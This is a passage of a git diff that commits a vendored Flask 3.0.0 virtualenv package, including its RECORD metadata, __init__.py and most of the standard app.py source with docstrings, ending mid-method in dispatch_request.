+flask-3.0.0.dist-info/entry_points.txt,sha256=bBP7hTOS5fz9zLtC7sPofBZAlMkEvBxu7KqS6l5lvc4,40 +flask/__init__.py,sha256=6xMqdVA0FIQ2U1KVaGX3lzNCdXPzoHPaa0hvQCNcfSk,2625 +flask/__main__.py,sha256=bYt9eEaoRQWdejEHFD8REx9jxVEdZptECFsV7F49Ink,30 +flask/__pycache__/__init__.cpython-310.pyc,, +flask/__pycache__/__main__.cpython-310.pyc,, +flask/__pycache__/app.cpython-310.pyc,, +flask/__pycache__/blueprints.cpython-310.pyc,, +flask/__pycache__/cli.cpython-310.pyc,, +flask/__pycache__/config.cpython-310.pyc,, +flask/__pycache__/ctx.cpython-310.pyc,, +flask/__pycache__/debughelpers.cpython-310.pyc,, +flask/__pycache__/globals.cpython-310.pyc,, +flask/__pycache__/helpers.cpython-310.pyc,, +flask/__pycache__/logging.cpython-310.pyc,, +flask/__pycache__/sessions.cpython-310.pyc,, +flask/__pycache__/signals.cpython-310.pyc,, +flask/__pycache__/templating.cpython-310.pyc,, +flask/__pycache__/testing.cpython-310.pyc,, +flask/__pycache__/typing.cpython-310.pyc,, +flask/__pycache__/views.cpython-310.pyc,, +flask/__pycache__/wrappers.cpython-310.pyc,, +flask/app.py,sha256=voUkc9xk9B039AhVrU21GDpsQ6wqrr-NobqLx8fURfQ,59201 +flask/blueprints.py,sha256=zO8bLO9Xy1aVD92bDmzihutjVEXf8xdDaVfiy7c--Ck,3129 +flask/cli.py,sha256=PDwZCfPagi5GUzb-D6dEN7y20gWiVAg3ejRnxBKNHPA,33821 +flask/config.py,sha256=YZSZ-xpFj1iW1B1Kj1iDhpc5s7pHncloiRLqXhsU7Hs,12856 +flask/ctx.py,sha256=x2kGzUXtPzVyi2YSKrU_PV1AvtxTmh2iRdriJRTSPGM,14841 +flask/debughelpers.py,sha256=WKzD2FNTSimNSwCJVLr9_fFo1f2VlTWB5EZ6lmR5bwE,5548 +flask/globals.py,sha256=XdQZmStBmPIs8t93tjx6pO7Bm3gobAaONWkFcUHaGas,1713 +flask/helpers.py,sha256=ynEoMB7fdF5Y1P-ngxMjZDZWfrJ4St-9OGZZsTcUwx8,22992 +flask/json/__init__.py,sha256=pdtpoK2b0b1u7Sxbx3feM7VWhsI20l1yGAvbYWxaxvc,5572 +flask/json/__pycache__/__init__.cpython-310.pyc,, +flask/json/__pycache__/provider.cpython-310.pyc,, +flask/json/__pycache__/tag.cpython-310.pyc,, +flask/json/provider.py,sha256=VBKSK75t3OsTvZ3N10B3Fsu7-NdpfrGYcl41goQJ3q8,7640 +flask/json/tag.py,sha256=ihb7QWrNEr0YC3KD4TolZbftgSPCuLk7FAvK49huYC0,8871 +flask/logging.py,sha256=VcdJgW4Axm5l_-7vXLQjRTL0eckaMks7Ya_HaoDm0wg,2330 +flask/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +flask/sansio/README.md,sha256=-0X1tECnilmz1cogx-YhNw5d7guK7GKrq_DEV2OzlU0,228 +flask/sansio/__pycache__/app.cpython-310.pyc,, +flask/sansio/__pycache__/blueprints.cpython-310.pyc,, 
+flask/sansio/__pycache__/scaffold.cpython-310.pyc,, +flask/sansio/app.py,sha256=nZWCFMOW8qK95Ck9UvDzxvswQr-coLJhIFaa_OVobCc,37977 +flask/sansio/blueprints.py,sha256=caskVI1Zf3mM5msevK5-tWy3VqX_A8mlB0KGNyRx5_0,24319 +flask/sansio/scaffold.py,sha256=-Cus0cVS4PmLof4qLvfjSQzk4AKsLqPR6LBpv6ALw3Y,30580 +flask/sessions.py,sha256=rFH2QKXG24dEazkKGxAHqUpAUh_30hDHrddhVYgAcY0,14169 +flask/signals.py,sha256=V7lMUww7CqgJ2ThUBn1PiatZtQanOyt7OZpu2GZI-34,750 +flask/templating.py,sha256=EtL8CE5z2aefdR1I-TWYVNg0cSuXBqz_lvOGKeggktk,7538 +flask/testing.py,sha256=h7AinggrMgGzKlDN66VfB0JjWW4Z1U_OD6FyjqBNiYM,10017 +flask/typing.py,sha256=2pGlhSaZqJVJOoh-QdH-20QVzl2r-zLXyP8otXfCCs4,3156 +flask/views.py,sha256=V5hOGZLx0Bn99QGcM6mh5x_uM-MypVT0-RysEFU84jc,6789 +flask/wrappers.py,sha256=PhMp3teK3SnEmIdog59cO_DHiZ9Btn0qI1EifrTdwP8,5709 diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/REQUESTED b/env/Lib/site-packages/flask-3.0.0.dist-info/REQUESTED new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/WHEEL b/env/Lib/site-packages/flask-3.0.0.dist-info/WHEEL new file mode 100644 index 00000000..3b5e64b5 --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: flit 3.9.0 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/entry_points.txt b/env/Lib/site-packages/flask-3.0.0.dist-info/entry_points.txt new file mode 100644 index 00000000..eec6733e --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/entry_points.txt @@ -0,0 +1,3 @@ +[console_scripts] +flask=flask.cli:main + diff --git a/env/Lib/site-packages/flask/__init__.py b/env/Lib/site-packages/flask/__init__.py new file mode 100644 index 00000000..e86eb43e --- /dev/null +++ b/env/Lib/site-packages/flask/__init__.py @@ -0,0 +1,60 @@ +from __future__ import annotations + +import typing as t + +from . 
import json as json +from .app import Flask as Flask +from .blueprints import Blueprint as Blueprint +from .config import Config as Config +from .ctx import after_this_request as after_this_request +from .ctx import copy_current_request_context as copy_current_request_context +from .ctx import has_app_context as has_app_context +from .ctx import has_request_context as has_request_context +from .globals import current_app as current_app +from .globals import g as g +from .globals import request as request +from .globals import session as session +from .helpers import abort as abort +from .helpers import flash as flash +from .helpers import get_flashed_messages as get_flashed_messages +from .helpers import get_template_attribute as get_template_attribute +from .helpers import make_response as make_response +from .helpers import redirect as redirect +from .helpers import send_file as send_file +from .helpers import send_from_directory as send_from_directory +from .helpers import stream_with_context as stream_with_context +from .helpers import url_for as url_for +from .json import jsonify as jsonify +from .signals import appcontext_popped as appcontext_popped +from .signals import appcontext_pushed as appcontext_pushed +from .signals import appcontext_tearing_down as appcontext_tearing_down +from .signals import before_render_template as before_render_template +from .signals import got_request_exception as got_request_exception +from .signals import message_flashed as message_flashed +from .signals import request_finished as request_finished +from .signals import request_started as request_started +from .signals import request_tearing_down as request_tearing_down +from .signals import template_rendered as template_rendered +from .templating import render_template as render_template +from .templating import render_template_string as render_template_string +from .templating import stream_template as stream_template +from .templating import stream_template_string as stream_template_string +from .wrappers import Request as Request +from .wrappers import Response as Response + + +def __getattr__(name: str) -> t.Any: + if name == "__version__": + import importlib.metadata + import warnings + + warnings.warn( + "The '__version__' attribute is deprecated and will be removed in" + " Flask 3.1. 
Use feature detection or" + " 'importlib.metadata.version(\"flask\")' instead.", + DeprecationWarning, + stacklevel=2, + ) + return importlib.metadata.version("flask") + + raise AttributeError(name) diff --git a/env/Lib/site-packages/flask/__main__.py b/env/Lib/site-packages/flask/__main__.py new file mode 100644 index 00000000..4e28416e --- /dev/null +++ b/env/Lib/site-packages/flask/__main__.py @@ -0,0 +1,3 @@ +from .cli import main + +main() diff --git a/env/Lib/site-packages/flask/app.py b/env/Lib/site-packages/flask/app.py new file mode 100644 index 00000000..d710cb96 --- /dev/null +++ b/env/Lib/site-packages/flask/app.py @@ -0,0 +1,1478 @@ +from __future__ import annotations + +import os +import sys +import typing as t +import weakref +from collections.abc import Iterator as _abc_Iterator +from datetime import timedelta +from inspect import iscoroutinefunction +from itertools import chain +from types import TracebackType +from urllib.parse import quote as _url_quote + +import click +from werkzeug.datastructures import Headers +from werkzeug.datastructures import ImmutableDict +from werkzeug.exceptions import BadRequestKeyError +from werkzeug.exceptions import HTTPException +from werkzeug.exceptions import InternalServerError +from werkzeug.routing import BuildError +from werkzeug.routing import MapAdapter +from werkzeug.routing import RequestRedirect +from werkzeug.routing import RoutingException +from werkzeug.routing import Rule +from werkzeug.serving import is_running_from_reloader +from werkzeug.wrappers import Response as BaseResponse + +from . import cli +from . import typing as ft +from .ctx import AppContext +from .ctx import RequestContext +from .globals import _cv_app +from .globals import _cv_request +from .globals import current_app +from .globals import g +from .globals import request +from .globals import request_ctx +from .globals import session +from .helpers import get_debug_flag +from .helpers import get_flashed_messages +from .helpers import get_load_dotenv +from .helpers import send_from_directory +from .sansio.app import App +from .sansio.scaffold import _sentinel +from .sessions import SecureCookieSessionInterface +from .sessions import SessionInterface +from .signals import appcontext_tearing_down +from .signals import got_request_exception +from .signals import request_finished +from .signals import request_started +from .signals import request_tearing_down +from .templating import Environment +from .wrappers import Request +from .wrappers import Response + +if t.TYPE_CHECKING: # pragma: no cover + from .testing import FlaskClient + from .testing import FlaskCliRunner + +T_shell_context_processor = t.TypeVar( + "T_shell_context_processor", bound=ft.ShellContextProcessorCallable +) +T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) +T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) +T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) +T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) + + +def _make_timedelta(value: timedelta | int | None) -> timedelta | None: + if value is None or isinstance(value, timedelta): + return value + + return timedelta(seconds=value) + + +class Flask(App): + """The flask object implements a WSGI application and acts as the central + object. It is passed the name of the module or package of the + application. 
Once it is created it will act as a central registry for + the view functions, the URL rules, template configuration and much more. + + The name of the package is used to resolve resources from inside the + package or the folder the module is contained in depending on if the + package parameter resolves to an actual python package (a folder with + an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file). + + For more information about resource loading, see :func:`open_resource`. + + Usually you create a :class:`Flask` instance in your main module or + in the :file:`__init__.py` file of your package like this:: + + from flask import Flask + app = Flask(__name__) + + .. admonition:: About the First Parameter + + The idea of the first parameter is to give Flask an idea of what + belongs to your application. This name is used to find resources + on the filesystem, can be used by extensions to improve debugging + information and a lot more. + + So it's important what you provide there. If you are using a single + module, `__name__` is always the correct value. If you however are + using a package, it's usually recommended to hardcode the name of + your package there. + + For example if your application is defined in :file:`yourapplication/app.py` + you should create it with one of the two versions below:: + + app = Flask('yourapplication') + app = Flask(__name__.split('.')[0]) + + Why is that? The application will work even with `__name__`, thanks + to how resources are looked up. However it will make debugging more + painful. Certain extensions can make assumptions based on the + import name of your application. For example the Flask-SQLAlchemy + extension will look for the code in your application that triggered + an SQL query in debug mode. If the import name is not properly set + up, that debugging information is lost. (For example it would only + pick up SQL queries in `yourapplication.app` and not + `yourapplication.views.frontend`) + + .. versionadded:: 0.7 + The `static_url_path`, `static_folder`, and `template_folder` + parameters were added. + + .. versionadded:: 0.8 + The `instance_path` and `instance_relative_config` parameters were + added. + + .. versionadded:: 0.11 + The `root_path` parameter was added. + + .. versionadded:: 1.0 + The ``host_matching`` and ``static_host`` parameters were added. + + .. versionadded:: 1.0 + The ``subdomain_matching`` parameter was added. Subdomain + matching needs to be enabled manually now. Setting + :data:`SERVER_NAME` does not implicitly enable it. + + :param import_name: the name of the application package + :param static_url_path: can be used to specify a different path for the + static files on the web. Defaults to the name + of the `static_folder` folder. + :param static_folder: The folder with static files that is served at + ``static_url_path``. Relative to the application ``root_path`` + or an absolute path. Defaults to ``'static'``. + :param static_host: the host to use when adding the static route. + Defaults to None. Required when using ``host_matching=True`` + with a ``static_folder`` configured. + :param host_matching: set ``url_map.host_matching`` attribute. + Defaults to False. + :param subdomain_matching: consider the subdomain relative to + :data:`SERVER_NAME` when matching routes. Defaults to False. + :param template_folder: the folder that contains the templates that should + be used by the application. Defaults to + ``'templates'`` folder in the root path of the + application. 
+ :param instance_path: An alternative instance path for the application. + By default the folder ``'instance'`` next to the + package or module is assumed to be the instance + path. + :param instance_relative_config: if set to ``True`` relative filenames + for loading the config are assumed to + be relative to the instance path instead + of the application root. + :param root_path: The path to the root of the application files. + This should only be set manually when it can't be detected + automatically, such as for namespace packages. + """ + + default_config = ImmutableDict( + { + "DEBUG": None, + "TESTING": False, + "PROPAGATE_EXCEPTIONS": None, + "SECRET_KEY": None, + "PERMANENT_SESSION_LIFETIME": timedelta(days=31), + "USE_X_SENDFILE": False, + "SERVER_NAME": None, + "APPLICATION_ROOT": "/", + "SESSION_COOKIE_NAME": "session", + "SESSION_COOKIE_DOMAIN": None, + "SESSION_COOKIE_PATH": None, + "SESSION_COOKIE_HTTPONLY": True, + "SESSION_COOKIE_SECURE": False, + "SESSION_COOKIE_SAMESITE": None, + "SESSION_REFRESH_EACH_REQUEST": True, + "MAX_CONTENT_LENGTH": None, + "SEND_FILE_MAX_AGE_DEFAULT": None, + "TRAP_BAD_REQUEST_ERRORS": None, + "TRAP_HTTP_EXCEPTIONS": False, + "EXPLAIN_TEMPLATE_LOADING": False, + "PREFERRED_URL_SCHEME": "http", + "TEMPLATES_AUTO_RELOAD": None, + "MAX_COOKIE_SIZE": 4093, + } + ) + + #: The class that is used for request objects. See :class:`~flask.Request` + #: for more information. + request_class = Request + + #: The class that is used for response objects. See + #: :class:`~flask.Response` for more information. + response_class = Response + + #: the session interface to use. By default an instance of + #: :class:`~flask.sessions.SecureCookieSessionInterface` is used here. + #: + #: .. versionadded:: 0.8 + session_interface: SessionInterface = SecureCookieSessionInterface() + + def __init__( + self, + import_name: str, + static_url_path: str | None = None, + static_folder: str | os.PathLike | None = "static", + static_host: str | None = None, + host_matching: bool = False, + subdomain_matching: bool = False, + template_folder: str | os.PathLike | None = "templates", + instance_path: str | None = None, + instance_relative_config: bool = False, + root_path: str | None = None, + ): + super().__init__( + import_name=import_name, + static_url_path=static_url_path, + static_folder=static_folder, + static_host=static_host, + host_matching=host_matching, + subdomain_matching=subdomain_matching, + template_folder=template_folder, + instance_path=instance_path, + instance_relative_config=instance_relative_config, + root_path=root_path, + ) + + # Add a static route using the provided static_url_path, static_host, + # and static_folder if there is a configured static_folder. + # Note we do this without checking if static_folder exists. + # For one, it might be created while the server is running (e.g. during + # development). Also, Google App Engine stores static files somewhere + if self.has_static_folder: + assert ( + bool(static_host) == host_matching + ), "Invalid static_host/host_matching combination" + # Use a weakref to avoid creating a reference cycle between the app + # and the view function (see #3761). 
+ self_ref = weakref.ref(self) + self.add_url_rule( + f"{self.static_url_path}/", + endpoint="static", + host=static_host, + view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 + ) + + def get_send_file_max_age(self, filename: str | None) -> int | None: + """Used by :func:`send_file` to determine the ``max_age`` cache + value for a given file path if it wasn't passed. + + By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from + the configuration of :data:`~flask.current_app`. This defaults + to ``None``, which tells the browser to use conditional requests + instead of a timed cache, which is usually preferable. + + Note this is a duplicate of the same method in the Flask + class. + + .. versionchanged:: 2.0 + The default configuration is ``None`` instead of 12 hours. + + .. versionadded:: 0.9 + """ + value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"] + + if value is None: + return None + + if isinstance(value, timedelta): + return int(value.total_seconds()) + + return value + + def send_static_file(self, filename: str) -> Response: + """The view function used to serve files from + :attr:`static_folder`. A route is automatically registered for + this view at :attr:`static_url_path` if :attr:`static_folder` is + set. + + Note this is a duplicate of the same method in the Flask + class. + + .. versionadded:: 0.5 + + """ + if not self.has_static_folder: + raise RuntimeError("'static_folder' must be set to serve static_files.") + + # send_file only knows to call get_send_file_max_age on the app, + # call it here so it works for blueprints too. + max_age = self.get_send_file_max_age(filename) + return send_from_directory( + t.cast(str, self.static_folder), filename, max_age=max_age + ) + + def open_resource(self, resource: str, mode: str = "rb") -> t.IO[t.AnyStr]: + """Open a resource file relative to :attr:`root_path` for + reading. + + For example, if the file ``schema.sql`` is next to the file + ``app.py`` where the ``Flask`` app is defined, it can be opened + with: + + .. code-block:: python + + with app.open_resource("schema.sql") as f: + conn.executescript(f.read()) + + :param resource: Path to the resource relative to + :attr:`root_path`. + :param mode: Open the file in this mode. Only reading is + supported, valid values are "r" (or "rt") and "rb". + + Note this is a duplicate of the same method in the Flask + class. + + """ + if mode not in {"r", "rt", "rb"}: + raise ValueError("Resources can only be opened for reading.") + + return open(os.path.join(self.root_path, resource), mode) + + def open_instance_resource(self, resource: str, mode: str = "rb") -> t.IO[t.AnyStr]: + """Opens a resource from the application's instance folder + (:attr:`instance_path`). Otherwise works like + :meth:`open_resource`. Instance resources can also be opened for + writing. + + :param resource: the name of the resource. To access resources within + subfolders use forward slashes as separator. + :param mode: resource file opening mode, default is 'rb'. + """ + return open(os.path.join(self.instance_path, resource), mode) + + def create_jinja_environment(self) -> Environment: + """Create the Jinja environment based on :attr:`jinja_options` + and the various Jinja-related methods of the app. Changing + :attr:`jinja_options` after this will have no effect. Also adds + Flask-related globals and filters to the environment. + + .. versionchanged:: 0.11 + ``Environment.auto_reload`` set in accordance with + ``TEMPLATES_AUTO_RELOAD`` configuration option. + + .. 
versionadded:: 0.5 + """ + options = dict(self.jinja_options) + + if "autoescape" not in options: + options["autoescape"] = self.select_jinja_autoescape + + if "auto_reload" not in options: + auto_reload = self.config["TEMPLATES_AUTO_RELOAD"] + + if auto_reload is None: + auto_reload = self.debug + + options["auto_reload"] = auto_reload + + rv = self.jinja_environment(self, **options) + rv.globals.update( + url_for=self.url_for, + get_flashed_messages=get_flashed_messages, + config=self.config, + # request, session and g are normally added with the + # context processor for efficiency reasons but for imported + # templates we also want the proxies in there. + request=request, + session=session, + g=g, + ) + rv.policies["json.dumps_function"] = self.json.dumps + return rv + + def create_url_adapter(self, request: Request | None) -> MapAdapter | None: + """Creates a URL adapter for the given request. The URL adapter + is created at a point where the request context is not yet set + up so the request is passed explicitly. + + .. versionadded:: 0.6 + + .. versionchanged:: 0.9 + This can now also be called without a request object when the + URL adapter is created for the application context. + + .. versionchanged:: 1.0 + :data:`SERVER_NAME` no longer implicitly enables subdomain + matching. Use :attr:`subdomain_matching` instead. + """ + if request is not None: + # If subdomain matching is disabled (the default), use the + # default subdomain in all cases. This should be the default + # in Werkzeug but it currently does not have that feature. + if not self.subdomain_matching: + subdomain = self.url_map.default_subdomain or None + else: + subdomain = None + + return self.url_map.bind_to_environ( + request.environ, + server_name=self.config["SERVER_NAME"], + subdomain=subdomain, + ) + # We need at the very least the server name to be set for this + # to work. + if self.config["SERVER_NAME"] is not None: + return self.url_map.bind( + self.config["SERVER_NAME"], + script_name=self.config["APPLICATION_ROOT"], + url_scheme=self.config["PREFERRED_URL_SCHEME"], + ) + + return None + + def raise_routing_exception(self, request: Request) -> t.NoReturn: + """Intercept routing exceptions and possibly do something else. + + In debug mode, intercept a routing redirect and replace it with + an error if the body will be discarded. + + With modern Werkzeug this shouldn't occur, since it now uses a + 308 status which tells the browser to resend the method and + body. + + .. versionchanged:: 2.1 + Don't intercept 307 and 308 redirects. + + :meta private: + :internal: + """ + if ( + not self.debug + or not isinstance(request.routing_exception, RequestRedirect) + or request.routing_exception.code in {307, 308} + or request.method in {"GET", "HEAD", "OPTIONS"} + ): + raise request.routing_exception # type: ignore + + from .debughelpers import FormDataRoutingRedirect + + raise FormDataRoutingRedirect(request) + + def update_template_context(self, context: dict) -> None: + """Update the template context with some commonly used variables. + This injects request, session, config and g into the template + context as well as everything template context processors want + to inject. Note that the as of Flask 0.6, the original values + in the context will not be overridden if a context processor + decides to return a value with the same key. + + :param context: the context as a dictionary that is updated in place + to add extra variables. 
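An illustrative sketch of the behaviour described above (not taken from the vendored file; ``index.html`` and the literal values are placeholders): a context processor supplies a default, but a value passed explicitly to ``render_template`` is kept, since the original context is re-applied after the processors run.

.. code-block:: python

    from flask import Flask, render_template

    app = Flask(__name__)

    @app.context_processor
    def inject_site_name():
        # Offered to every template render...
        return {"site_name": "Default Site"}

    @app.route("/")
    def index():
        # ...but the explicit keyword argument wins: update_template_context()
        # re-applies the values passed to render_template after the processors run.
        return render_template("index.html", site_name="Explicit Override")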
+ """ + names: t.Iterable[str | None] = (None,) + + # A template may be rendered outside a request context. + if request: + names = chain(names, reversed(request.blueprints)) + + # The values passed to render_template take precedence. Keep a + # copy to re-apply after all context functions. + orig_ctx = context.copy() + + for name in names: + if name in self.template_context_processors: + for func in self.template_context_processors[name]: + context.update(self.ensure_sync(func)()) + + context.update(orig_ctx) + + def make_shell_context(self) -> dict: + """Returns the shell context for an interactive shell for this + application. This runs all the registered shell context + processors. + + .. versionadded:: 0.11 + """ + rv = {"app": self, "g": g} + for processor in self.shell_context_processors: + rv.update(processor()) + return rv + + def run( + self, + host: str | None = None, + port: int | None = None, + debug: bool | None = None, + load_dotenv: bool = True, + **options: t.Any, + ) -> None: + """Runs the application on a local development server. + + Do not use ``run()`` in a production setting. It is not intended to + meet security and performance requirements for a production server. + Instead, see :doc:`/deploying/index` for WSGI server recommendations. + + If the :attr:`debug` flag is set the server will automatically reload + for code changes and show a debugger in case an exception happened. + + If you want to run the application in debug mode, but disable the + code execution on the interactive debugger, you can pass + ``use_evalex=False`` as parameter. This will keep the debugger's + traceback screen active, but disable code execution. + + It is not recommended to use this function for development with + automatic reloading as this is badly supported. Instead you should + be using the :command:`flask` command line script's ``run`` support. + + .. admonition:: Keep in Mind + + Flask will suppress any server error with a generic error page + unless it is in debug mode. As such to enable just the + interactive debugger without the code reloading, you have to + invoke :meth:`run` with ``debug=True`` and ``use_reloader=False``. + Setting ``use_debugger`` to ``True`` without being in debug mode + won't catch any exceptions because there won't be any to + catch. + + :param host: the hostname to listen on. Set this to ``'0.0.0.0'`` to + have the server available externally as well. Defaults to + ``'127.0.0.1'`` or the host in the ``SERVER_NAME`` config variable + if present. + :param port: the port of the webserver. Defaults to ``5000`` or the + port defined in the ``SERVER_NAME`` config variable if present. + :param debug: if given, enable or disable debug mode. See + :attr:`debug`. + :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv` + files to set environment variables. Will also change the working + directory to the directory containing the first file found. + :param options: the options to be forwarded to the underlying Werkzeug + server. See :func:`werkzeug.serving.run_simple` for more + information. + + .. versionchanged:: 1.0 + If installed, python-dotenv will be used to load environment + variables from :file:`.env` and :file:`.flaskenv` files. + + The :envvar:`FLASK_DEBUG` environment variable will override :attr:`debug`. + + Threaded mode is enabled by default. + + .. versionchanged:: 0.10 + The default port is now picked from the ``SERVER_NAME`` + variable. 
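A minimal, assumed sketch of invoking ``run()`` with the parameters documented above; the route and return value are placeholders and, as the docstring warns, this is for local development only, not production serving:

.. code-block:: python

    from flask import Flask

    app = Flask(__name__)

    @app.route("/")
    def hello():
        return "Hello, World!"

    if __name__ == "__main__":
        # Development server only; host/port/debug mirror the parameters above.
        app.run(host="127.0.0.1", port=5000, debug=True)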
+ """ + # Ignore this call so that it doesn't start another server if + # the 'flask run' command is used. + if os.environ.get("FLASK_RUN_FROM_CLI") == "true": + if not is_running_from_reloader(): + click.secho( + " * Ignoring a call to 'app.run()' that would block" + " the current 'flask' CLI command.\n" + " Only call 'app.run()' in an 'if __name__ ==" + ' "__main__"\' guard.', + fg="red", + ) + + return + + if get_load_dotenv(load_dotenv): + cli.load_dotenv() + + # if set, env var overrides existing value + if "FLASK_DEBUG" in os.environ: + self.debug = get_debug_flag() + + # debug passed to method overrides all other sources + if debug is not None: + self.debug = bool(debug) + + server_name = self.config.get("SERVER_NAME") + sn_host = sn_port = None + + if server_name: + sn_host, _, sn_port = server_name.partition(":") + + if not host: + if sn_host: + host = sn_host + else: + host = "127.0.0.1" + + if port or port == 0: + port = int(port) + elif sn_port: + port = int(sn_port) + else: + port = 5000 + + options.setdefault("use_reloader", self.debug) + options.setdefault("use_debugger", self.debug) + options.setdefault("threaded", True) + + cli.show_server_banner(self.debug, self.name) + + from werkzeug.serving import run_simple + + try: + run_simple(t.cast(str, host), port, self, **options) + finally: + # reset the first request information if the development server + # reset normally. This makes it possible to restart the server + # without reloader and that stuff from an interactive shell. + self._got_first_request = False + + def test_client(self, use_cookies: bool = True, **kwargs: t.Any) -> FlaskClient: + """Creates a test client for this application. For information + about unit testing head over to :doc:`/testing`. + + Note that if you are testing for assertions or exceptions in your + application code, you must set ``app.testing = True`` in order for the + exceptions to propagate to the test client. Otherwise, the exception + will be handled by the application (not visible to the test client) and + the only indication of an AssertionError or other exception will be a + 500 status code response to the test client. See the :attr:`testing` + attribute. For example:: + + app.testing = True + client = app.test_client() + + The test client can be used in a ``with`` block to defer the closing down + of the context until the end of the ``with`` block. This is useful if + you want to access the context locals for testing:: + + with app.test_client() as c: + rv = c.get('/?vodka=42') + assert request.args['vodka'] == '42' + + Additionally, you may pass optional keyword arguments that will then + be passed to the application's :attr:`test_client_class` constructor. + For example:: + + from flask.testing import FlaskClient + + class CustomClient(FlaskClient): + def __init__(self, *args, **kwargs): + self._authentication = kwargs.pop("authentication") + super(CustomClient,self).__init__( *args, **kwargs) + + app.test_client_class = CustomClient + client = app.test_client(authentication='Basic ....') + + See :class:`~flask.testing.FlaskClient` for more information. + + .. versionchanged:: 0.4 + added support for ``with`` block usage for the client. + + .. versionadded:: 0.7 + The `use_cookies` parameter was added as well as the ability + to override the client to be used by setting the + :attr:`test_client_class` attribute. + + .. versionchanged:: 0.11 + Added `**kwargs` to support passing additional keyword arguments to + the constructor of :attr:`test_client_class`. 
+ """ + cls = self.test_client_class + if cls is None: + from .testing import FlaskClient as cls + return cls( # type: ignore + self, self.response_class, use_cookies=use_cookies, **kwargs + ) + + def test_cli_runner(self, **kwargs: t.Any) -> FlaskCliRunner: + """Create a CLI runner for testing CLI commands. + See :ref:`testing-cli`. + + Returns an instance of :attr:`test_cli_runner_class`, by default + :class:`~flask.testing.FlaskCliRunner`. The Flask app object is + passed as the first argument. + + .. versionadded:: 1.0 + """ + cls = self.test_cli_runner_class + + if cls is None: + from .testing import FlaskCliRunner as cls + + return cls(self, **kwargs) # type: ignore + + def handle_http_exception( + self, e: HTTPException + ) -> HTTPException | ft.ResponseReturnValue: + """Handles an HTTP exception. By default this will invoke the + registered error handlers and fall back to returning the + exception as response. + + .. versionchanged:: 1.0.3 + ``RoutingException``, used internally for actions such as + slash redirects during routing, is not passed to error + handlers. + + .. versionchanged:: 1.0 + Exceptions are looked up by code *and* by MRO, so + ``HTTPException`` subclasses can be handled with a catch-all + handler for the base ``HTTPException``. + + .. versionadded:: 0.3 + """ + # Proxy exceptions don't have error codes. We want to always return + # those unchanged as errors + if e.code is None: + return e + + # RoutingExceptions are used internally to trigger routing + # actions, such as slash redirects raising RequestRedirect. They + # are not raised or handled in user code. + if isinstance(e, RoutingException): + return e + + handler = self._find_error_handler(e, request.blueprints) + if handler is None: + return e + return self.ensure_sync(handler)(e) + + def handle_user_exception( + self, e: Exception + ) -> HTTPException | ft.ResponseReturnValue: + """This method is called whenever an exception occurs that + should be handled. A special case is :class:`~werkzeug + .exceptions.HTTPException` which is forwarded to the + :meth:`handle_http_exception` method. This function will either + return a response value or reraise the exception with the same + traceback. + + .. versionchanged:: 1.0 + Key errors raised from request data like ``form`` show the + bad key in debug mode rather than a generic bad request + message. + + .. versionadded:: 0.7 + """ + if isinstance(e, BadRequestKeyError) and ( + self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"] + ): + e.show_exception = True + + if isinstance(e, HTTPException) and not self.trap_http_exception(e): + return self.handle_http_exception(e) + + handler = self._find_error_handler(e, request.blueprints) + + if handler is None: + raise + + return self.ensure_sync(handler)(e) + + def handle_exception(self, e: Exception) -> Response: + """Handle an exception that did not have an error handler + associated with it, or that was raised from an error handler. + This always causes a 500 ``InternalServerError``. + + Always sends the :data:`got_request_exception` signal. + + If :data:`PROPAGATE_EXCEPTIONS` is ``True``, such as in debug + mode, the error will be re-raised so that the debugger can + display it. Otherwise, the original exception is logged, and + an :exc:`~werkzeug.exceptions.InternalServerError` is returned. + + If an error handler is registered for ``InternalServerError`` or + ``500``, it will be used. For consistency, the handler will + always receive the ``InternalServerError``. 
The original + unhandled exception is available as ``e.original_exception``. + + .. versionchanged:: 1.1.0 + Always passes the ``InternalServerError`` instance to the + handler, setting ``original_exception`` to the unhandled + error. + + .. versionchanged:: 1.1.0 + ``after_request`` functions and other finalization is done + even for the default 500 response when there is no handler. + + .. versionadded:: 0.3 + """ + exc_info = sys.exc_info() + got_request_exception.send(self, _async_wrapper=self.ensure_sync, exception=e) + propagate = self.config["PROPAGATE_EXCEPTIONS"] + + if propagate is None: + propagate = self.testing or self.debug + + if propagate: + # Re-raise if called with an active exception, otherwise + # raise the passed in exception. + if exc_info[1] is e: + raise + + raise e + + self.log_exception(exc_info) + server_error: InternalServerError | ft.ResponseReturnValue + server_error = InternalServerError(original_exception=e) + handler = self._find_error_handler(server_error, request.blueprints) + + if handler is not None: + server_error = self.ensure_sync(handler)(server_error) + + return self.finalize_request(server_error, from_error_handler=True) + + def log_exception( + self, + exc_info: (tuple[type, BaseException, TracebackType] | tuple[None, None, None]), + ) -> None: + """Logs an exception. This is called by :meth:`handle_exception` + if debugging is disabled and right before the handler is called. + The default implementation logs the exception as error on the + :attr:`logger`. + + .. versionadded:: 0.8 + """ + self.logger.error( + f"Exception on {request.path} [{request.method}]", exc_info=exc_info + ) + + def dispatch_request(self) -> ft.ResponseReturnValue: + """Does the request dispatching. Matches the URL and returns the + return value of the view or error handler. This does not have to + be a response object. In order to convert the return value to a + proper response object, call :func:`make_response`. + + .. versionchanged:: 0.7 + This no longer does the exception handling, this code was + moved to the new :meth:`full_dispatch_request`. + """ + req = request_ctx.request + if req.routing_exception is not None: + self.raise_routing_exception(req) + rule: Rule = req.url_rule # type: ignore[assignment] + # if we provide automatic options for this URL and the + # request came with the OPTIONS method, reply automatically + if ( + 